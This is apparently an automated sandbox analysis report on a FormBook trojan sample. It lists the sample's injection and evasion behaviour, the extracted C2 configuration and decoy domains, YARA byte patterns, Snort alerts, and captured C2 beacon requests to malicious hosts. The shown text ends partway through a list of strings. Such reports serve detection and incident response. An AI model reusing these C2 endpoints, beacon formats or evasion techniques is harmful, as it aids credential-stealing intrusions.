Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2FcJgghyXg.exe

Overview

General Information

Sample Name:2FcJgghyXg.exe
Original Sample Name:4f91d6f43a69717ff16f3c09dcd0e7e8.exe
Analysis ID:1304954
MD5:4f91d6f43a69717ff16f3c09dcd0e7e8
SHA1:51406ad0646c199764a7b2a26e2d31fed91ad77f
SHA256:035c64adedb7e567711f5a793c587b5886bea69e725a5f038f2b7f01a1eebd5d
Tags:32exetrojan
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Found decision node followed by non-executed suspicious APIs
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 2FcJgghyXg.exe (PID: 7656 cmdline: C:\Users\user\Desktop\2FcJgghyXg.exe MD5: 4F91D6F43A69717FF16F3C09DCD0E7E8)
    • 2FcJgghyXg.exe (PID: 7700 cmdline: C:\Users\user\Desktop\2FcJgghyXg.exe MD5: 4F91D6F43A69717FF16F3C09DCD0E7E8)
      • explorer.exe (PID: 4884 cmdline: C:\Windows\Explorer.EXE MD5: DDB206DDECAF3B327A418B262EE33468)
        • msdt.exe (PID: 7736 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 35F3075ABFA89839B62E52CD29F62954)
          • cmd.exe (PID: 7756 cmdline: /c del "C:\Users\user\Desktop\2FcJgghyXg.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 86191D9E0E30631DB3E78E4645804358)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.l1z3x.cfd/us94/"], "decoy": ["bigelowteaclassaction.com", "barbieexpert.com", "techxworth.com", "soccercitycupsc.com", "konstantynovm.com", "password-manager-66532.bond", "81098a.com", "pkr-performance.com", "craftwoodcapital.com", "j5tm84qrs.top", "bathroomdesign.info", "vrun.live", "clotchek.info", "73460.xyz", "activecollagenmax.com", "truijkl.xyz", "2jci2xj.shop", "sorveteria.net", "02-00.com", "hearing-aids-21865.bond", "ssongg2012.cfd", "ssongg774.cfd", "ty45mmo.click", "shztsysp.com", "stbtsd.com", "sportnsmile.com", "libertaddesertu.com", "linebahis343.com", "ontheroadfromdamascus.com", "pittsleyinsurance.com", "bkdug.win", "hanabi104.online", "emperorvigortonic.info", "36dgwqkv.asia", "terminalcomputer.info", "aaaws.site", "bzfsdgsddu.asia", "simarnit.com", "lexitechlife.com", "n286.top", "uniquecandles.space", "iymew-mall.com", "b-cr5.ink", "nixiegroup.com", "joya-schoenen.com", "bordoderi.online", "abithashop.com", "omnicommedagroup.com", "hot-tubs-59198.bond", "tw8rvck.com", "vrinsured.com", "8526grand.com", "69v39.top", "jaxonthecheap.com", "texascarwrecks.info", "oqc.link", "sb12a.top", "66xecqk.top", "peacedecorfashion.com", "nazadypro.shop", "ana-mika.com", "funeralpin.com", "emdefencetech.com", "hgsna.link"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18839:$sqlite3step: 68 34 1C 7B E1
      • 0x1894c:$sqlite3step: 68 34 1C 7B E1
      • 0x18868:$sqlite3text: 68 38 2A 90 C5
      • 0x1898d:$sqlite3text: 68 38 2A 90 C5
      • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 30 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.2FcJgghyXg.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        2.2.2FcJgghyXg.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.2FcJgghyXg.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          2.2.2FcJgghyXg.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          2.2.2FcJgghyXg.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18839:$sqlite3step: 68 34 1C 7B E1
          • 0x1894c:$sqlite3step: 68 34 1C 7B E1
          • 0x18868:$sqlite3text: 68 38 2A 90 C5
          • 0x1898d:$sqlite3text: 68 38 2A 90 C5
          • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.834.120.175.6549774802031412 09/07/23-08:40:07.074597
          SID:2031412
          Source Port:49774
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.866.235.200.14549773802031412 09/07/23-08:39:43.584229
          SID:2031412
          Source Port:49773
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.8104.21.48.6849772802031412 09/07/23-08:39:22.654043
          SID:2031412
          Source Port:49772
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.891.195.240.12349771802031412 09/07/23-08:39:01.528390
          SID:2031412
          Source Port:49771
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.88.8.8.859429532023883 09/07/23-08:40:05.355051
          SID:2023883
          Source Port:59429
          Destination Port:53
          Protocol:UDP
          Classtype:Potentially Bad Traffic

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.l1z3x.cfd/us94/"], "decoy": ["bigelowteaclassaction.com", "barbieexpert.com", "techxworth.com", "soccercitycupsc.com", "konstantynovm.com", "password-manager-66532.bond", "81098a.com", "pkr-performance.com", "craftwoodcapital.com", "j5tm84qrs.top", "bathroomdesign.info", "vrun.live", "clotchek.info", "73460.xyz", "activecollagenmax.com", "truijkl.xyz", "2jci2xj.shop", "sorveteria.net", "02-00.com", "hearing-aids-21865.bond", "ssongg2012.cfd", "ssongg774.cfd", "ty45mmo.click", "shztsysp.com", "stbtsd.com", "sportnsmile.com", "libertaddesertu.com", "linebahis343.com", "ontheroadfromdamascus.com", "pittsleyinsurance.com", "bkdug.win", "hanabi104.online", "emperorvigortonic.info", "36dgwqkv.asia", "terminalcomputer.info", "aaaws.site", "bzfsdgsddu.asia", "simarnit.com", "lexitechlife.com", "n286.top", "uniquecandles.space", "iymew-mall.com", "b-cr5.ink", "nixiegroup.com", "joya-schoenen.com", "bordoderi.online", "abithashop.com", "omnicommedagroup.com", "hot-tubs-59198.bond", "tw8rvck.com", "vrinsured.com", "8526grand.com", "69v39.top", "jaxonthecheap.com", "texascarwrecks.info", "oqc.link", "sb12a.top", "66xecqk.top", "peacedecorfashion.com", "nazadypro.shop", "ana-mika.com", "funeralpin.com", "emdefencetech.com", "hgsna.link"]}
          Multi AV Scanner detection for submitted file
          Source: 2FcJgghyXg.exeReversingLabs: Detection: 39%
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.2FcJgghyXg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.2FcJgghyXg.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.hot-tubs-59198.bond/us94/www.simarnit.comAvira URL Cloud: Label: malware
          Source: http://www.69v39.top/us94/?FV9l7b=gRE/KZOmUIl0E9O5tIrQ1aSnWhjtkyGjsCPW33OGocf8yDxoSBdOJbLmmBtR+4NwNN+r&BbW=QzuhmF0pKLAvira URL Cloud: Label: phishing
          Source: http://www.truijkl.xyz/us94/www.j5tm84qrs.topAvira URL Cloud: Label: phishing
          Source: http://www.69v39.top/us94/Avira URL Cloud: Label: phishing
          Source: http://www.nazadypro.shop/us94/Avira URL Cloud: Label: malware
          Source: http://www.nazadypro.shop/us94/www.soccercitycupsc.comAvira URL Cloud: Label: malware
          Source: http://www.b-cr5.ink/us94/Avira URL Cloud: Label: malware
          Source: http://www.j5tm84qrs.top/us94/www.66xecqk.topAvira URL Cloud: Label: phishing
          Source: http://www.69v39.top/us94/www.l1z3x.cfdAvira URL Cloud: Label: phishing
          Source: http://www.66xecqk.top/us94/www.terminalcomputer.infoAvira URL Cloud: Label: phishing
          Source: http://www.j5tm84qrs.top/us94/Avira URL Cloud: Label: phishing
          Source: http://www.abithashop.com/us94/Avira URL Cloud: Label: malware
          Source: http://www.ontheroadfromdamascus.com/us94/Avira URL Cloud: Label: malware
          Source: http://www.hot-tubs-59198.bond/us94/Avira URL Cloud: Label: malware
          Source: http://www.simarnit.com/us94/www.hanabi104.onlineAvira URL Cloud: Label: malware
          Source: http://www.simarnit.com/us94/Avira URL Cloud: Label: malware
          Source: http://www.emdefencetech.com/us94/Avira URL Cloud: Label: malware
          Source: http://www.emdefencetech.com/us94/www.nazadypro.shopAvira URL Cloud: Label: malware
          Source: http://www.terminalcomputer.info/us94/www.b-cr5.inkAvira URL Cloud: Label: malware
          Source: http://www.abithashop.com/us94/www.truijkl.xyzAvira URL Cloud: Label: malware
          Source: http://www.emdefencetech.com/us94/?FV9l7b=09CVAw2tWRgghkhUEy5C5oLzHr5PLkNGN/bgaCa/HPdap5UhvkEM57dmWPBbgbvu1iSh&BbW=QzuhmF0pKLAvira URL Cloud: Label: malware
          Source: http://www.truijkl.xyz/us94/Avira URL Cloud: Label: phishing
          Source: http://www.ontheroadfromdamascus.com/us94/www.hot-tubs-59198.bondAvira URL Cloud: Label: malware
          Source: http://www.terminalcomputer.info/us94/Avira URL Cloud: Label: malware
          Source: http://www.hanabi104.online/us94/Avira URL Cloud: Label: malware
          Source: http://www.66xecqk.top/us94/Avira URL Cloud: Label: phishing
          Source: 2FcJgghyXg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 2FcJgghyXg.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: msdt.pdbGCTL source: 2FcJgghyXg.exe, 00000002.00000002.1324284737.0000000003350000.00000040.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2497776864.00000000007E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: xYQq.pdbSHA256K source: 2FcJgghyXg.exe
          Source: Binary string: wntdll.pdbUGP source: 2FcJgghyXg.exe, 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.2500706865.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.2500706865.0000000004DBD000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.1328099105.0000000004ADF000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.1322862387.0000000004924000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 2FcJgghyXg.exe, 2FcJgghyXg.exe, 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.2500706865.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.2500706865.0000000004DBD000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.1328099105.0000000004ADF000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.1322862387.0000000004924000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msdt.pdb source: 2FcJgghyXg.exe, 00000002.00000002.1324284737.0000000003350000.00000040.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2497776864.00000000007E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: xYQq.pdb source: 2FcJgghyXg.exe
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 4x nop then pop edi2_2_00416CD9

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 34.120.175.65 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.123 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.48.68 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.145 80Jump to behavior
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49771 -> 91.195.240.123:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49772 -> 104.21.48.68:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49773 -> 66.235.200.145:80
          Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.8:59429 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49774 -> 34.120.175.65:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.l1z3x.cfd/us94/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /us94/?FV9l7b=09CVAw2tWRgghkhUEy5C5oLzHr5PLkNGN/bgaCa/HPdap5UhvkEM57dmWPBbgbvu1iSh&BbW=QzuhmF0pKL HTTP/1.1Host: www.emdefencetech.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /us94/?FV9l7b=dEK1UcEseC60ArM7bnAGctGEpZul5aHqilxPZgyrfd7+4uauQhfO1u/GuBaUBJFU+KOU&BbW=QzuhmF0pKL HTTP/1.1Host: www.nazadypro.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /us94/?FV9l7b=S5srMiwBCDtV4rjo3jAT9rEjkkSDttoSOLAmgXzTQBVP9tcOlEr2qFRjTuqDw5Sxe1FF&BbW=QzuhmF0pKL HTTP/1.1Host: www.soccercitycupsc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /us94/?FV9l7b=gRE/KZOmUIl0E9O5tIrQ1aSnWhjtkyGjsCPW33OGocf8yDxoSBdOJbLmmBtR+4NwNN+r&BbW=QzuhmF0pKL HTTP/1.1Host: www.69v39.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 66.235.200.145 66.235.200.145
          Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Sep 2023 06:39:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kTYDAkJwCyw0%2BnhK7NN2bcwb94Iew%2FOYP2vLbo1Mp%2BeteJHtybie0loptL9iJqTk55Y3OiGn4digZd6g4%2BoNGUC4NxW6%2FXzw5tX3zUoews%2B3g0ZC575%2BgflLHEfb2IbFUbaSogI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 802cf4470aa209f7-LASalt-svc: h3=":443"; ma=86400Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: explorer.exe, 00000003.00000002.2504551014.00000000071E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1263284729.00000000071E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1267280115.00000000093C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1267280115.000000000942F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2509722390.00000000093C3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
          Source: explorer.exe, 00000003.00000002.2504551014.00000000071E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1263284729.00000000071E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1267280115.00000000093C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1267280115.000000000942F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2509722390.00000000093C3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
          Source: explorer.exe, 00000003.00000000.1267280115.00000000093F5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2509722390.00000000093F4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
          Source: explorer.exe, 00000003.00000000.1267280115.00000000093C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1267280115.000000000942F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2509722390.00000000093C3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
          Source: explorer.exe, 00000003.00000000.1259489346.0000000002BD0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1265595351.0000000007770000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1265570865.0000000007760000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.co
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.66xecqk.top
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.66xecqk.top/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.66xecqk.top/us94/www.terminalcomputer.info
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.66xecqk.topReferer:
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.69v39.top
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.69v39.top/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.69v39.top/us94/www.l1z3x.cfd
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.69v39.topReferer:
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.abithashop.com
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.abithashop.com/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.abithashop.com/us94/www.truijkl.xyz
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.abithashop.comReferer:
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-cr5.ink
